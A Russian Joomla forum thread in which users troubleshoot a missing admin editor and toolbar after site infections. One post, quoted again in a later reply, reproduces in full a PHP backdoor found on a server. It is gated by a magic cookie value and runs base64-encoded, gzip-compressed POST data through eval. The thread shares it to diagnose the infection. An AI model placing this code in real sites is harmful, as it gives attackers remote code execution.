Новости Joomla

0 Пользователей и 1 Гость просматривают эту тему.
  • 43 Ответов
  • 20810 Просмотров
*

britanec

  • Новичок
  • 3
  • 0 / 0
Не могу создать новый товар, отредактировать статьи, редактировать существующий товар. Смена редакторов не помогла.
Скрины:
*

Elektra

  • Захожу иногда
  • 69
  • 0 / 0
У меня утром все было нормально, а днем вот такая ерунда при добавлении материала, кэш чистила

*

kamit

  • Захожу иногда
  • 90
  • 2 / 0
Заметил, что в различных папках Joomla на сервере появляются файлы с различными названиями.. например, 1797.php с содержанием:
<?php
if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){
if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
  echo '<textarea id=areatext>';
  eval($msg);
  echo '</textarea>bg';
  exit;
}}
?>

На остальных сайтах посмотрел.. не обнаружил такого.
Сомневаюсь, что появление подобных файлов - это норм явление.
*

drey.tee

  • Новичок
  • 3
  • 0 / 0
Заметил, что в различных папках Joomla на сервере появляются файлы с различными названиями.. например, 1797.php с содержанием:
<?php
if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){
if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
  echo '<textarea id=areatext>';
  eval($msg);
  echo '</textarea>bg';
  exit;
}}
?>

Правильно сомневаетесь - это вредоносный код и надо чистить аккаунт,  если ещё актуально - обращайтесь к о мне.
*

drey.tee

  • Новичок
  • 3
  • 0 / 0
У меня проблема такая же, как и у автора. - не тулбара (к тому же меню двоится).
В модулях mod_toolbar published = 1
Файлы Joomla 2.5.4 перезалил, всё равно кнопок сохранить, отменить и пр. нету.  :(
В чём ещё проблема может крыться?
« Последнее редактирование: 23.08.2013, 19:22:21 от drey.tee »
*

ChugaRay

  • Новичок
  • 5
  • 0 / 0
В админ панели, при создании нового материала, пропал и не показывается вовсе визуальный редактор, только HTML верстка. Разделы, категории, названия материалов есть, а сам редактор исчез. Подскажите, что может произошло? С чем связанно? Как лечить?

p.s. был обнаружен sweb'ом вредоносный код, все вредные файлы удалил, но редактор так и не вернулся, что делать?
*

yevrowl

  • Захожу иногда
  • 267
  • 10 / 0
но редактор так и не вернулся, что делать?

Рекомендую включить плагины всех доступных редакторов, и затем в панели управления через менеджер пользователей поочерёдно назначать принудительно текущему пользователю (администратору). Хоть один из доступных по идее должен работать.
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
p.s. был обнаружен sweb'ом вредоносный код, все вредные файлы удалил, но редактор так и не вернулся, что делать?
перезалить /plugins/editors
А еще лучше- все файлы Joomla перезалить, кроме папки /installation
*

ChugaRay

  • Новичок
  • 5
  • 0 / 0
Рекомендую включить плагины всех доступных редакторов, и затем в панели управления через менеджер пользователей поочерёдно назначать принудительно текущему пользователю (администратору). Хоть один из доступных по идее должен работать.

Пробовал, но не помогло. Удалил все редакторы принудительно, а затем поставил tiny и JCE, вроде заработало, но теперь когда материал добавлен, выхожу из админ панели, занимаюсь своими делами, захожу обратно и редактора снова нету :(

*

ChugaRay

  • Новичок
  • 5
  • 0 / 0
перезалить /plugins/editors
А еще лучше- все файлы Joomla перезалить, кроме папки /installation

я устанавливаю через панель управления Joomla
"перезалить" в смысле вырезать-вставить-вырезать-вставить?
*

egorovv

  • Осваиваюсь на форуме
  • 35
  • 0 / 1
У меня такая -же проблема! Подскажите пожалуйста как выполнить этот запрос и в какой это таблице?
*

Elektra

  • Захожу иногда
  • 69
  • 0 / 0
*

Elektra

  • Захожу иногда
  • 69
  • 0 / 0
Не могу удалить расширения, в админке пропали некоторые кнопки Как вернуть?
*

SibUrsus

  • Новичок
  • 1
  • 0 / 0
Добрый день!
Столкнулся с похожими проблемам как и многие спрашивающие здесь. Надеюсь, и я получу хороший совет.
Итак.
Платформа: Linux 3.14.51-grsec x86_64 at gen181.hs.shared.masterhost.ru
Версия MySQL: 5.6.28-1+wheezy1+mh2-log
Версия PHP: 5.3.29-1+mh1
Веб-сервер: Apache
Версия Joomla: Joomla! 1.5.26 Stable [ senu takaa ama busani ] 27-March-2012 18:00 GMT
Нуб: 1 шт :-)

История. Последние 2 года все работало стабильно, требований к сайту немного - чтоб он был и регулярно обновлялся.
Но 3 дня назад зачесалось мне добавить ролик с ютьюба. К моему удивлению, TinyMCE  молча послал меня.
Я наугулил плагин Allvideos. При попытке установить, получил ошибку. Скриншот к сожалению не сделал, что-то с правами на папки. Тут я вспомнил, что в 13 году сайтик наш постоянно заражали всякой дрянью и мы обращались за помощью на ревизиум.ком. Они вычистили пакость и приняли ряд мер по профилактике.
Тут мне бы плюнуть и отступить, но бес уже овладел моим здравым смыслом...
У меня там стоит плагин (или как правильно? компонент?) AdminTools и в нем есть кнопка Fix Permissions. Её я нажал. Оллвидеос установился, но радость моя была преждевременной. Теперь, при  попытке добавить материал я получил такое окно:


Попытки отключать-подключать редакторы успеха не имели.
Поняв что дров я все таки наломал, подал заявку хостеру на откат на 2-х дневный бэкап. (у мастерхост он платный, кстати, не так чтоб дорого но неприятно)
Однако и это не помогло! Редактор по прежнему отображался со сбитой кодировкой и не весь! на всех браузерах. Кэш чистил. Тогда попробовал установить JCE. Fail. Удалил JCE  и вдобавок ко всем прочим неприятностям, про логине в админку теперь вижу такое:


Прошу совета.


« Последнее редактирование: 15.07.2016, 07:32:40 от SibUrsus »
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

При обновлении до Mobile-Joomla.2.1.21, пропали картинки

Автор Elimelech

Ответов: 0
Просмотров: 1789
Последний ответ 15.08.2017, 13:21:31
от Elimelech
Вместо админки - ошибка 404

Автор goshanchiik

Ответов: 4
Просмотров: 1406
Последний ответ 04.08.2017, 22:37:23
от voland
Не открываются некоторые страницы сайта

Автор nadin

Ответов: 5
Просмотров: 1510
Последний ответ 12.04.2017, 18:34:22
от SeBun
Браузер меняет адрес админки на другой

Автор _Jim_Bradberry_

Ответов: 1
Просмотров: 1382
Последний ответ 27.03.2017, 15:06:16
от _Jim_Bradberry_
Как свой модуль редактировать из админки?

Автор demiurge

Ответов: 0
Просмотров: 1312
Последний ответ 21.09.2015, 16:54:42
от demiurge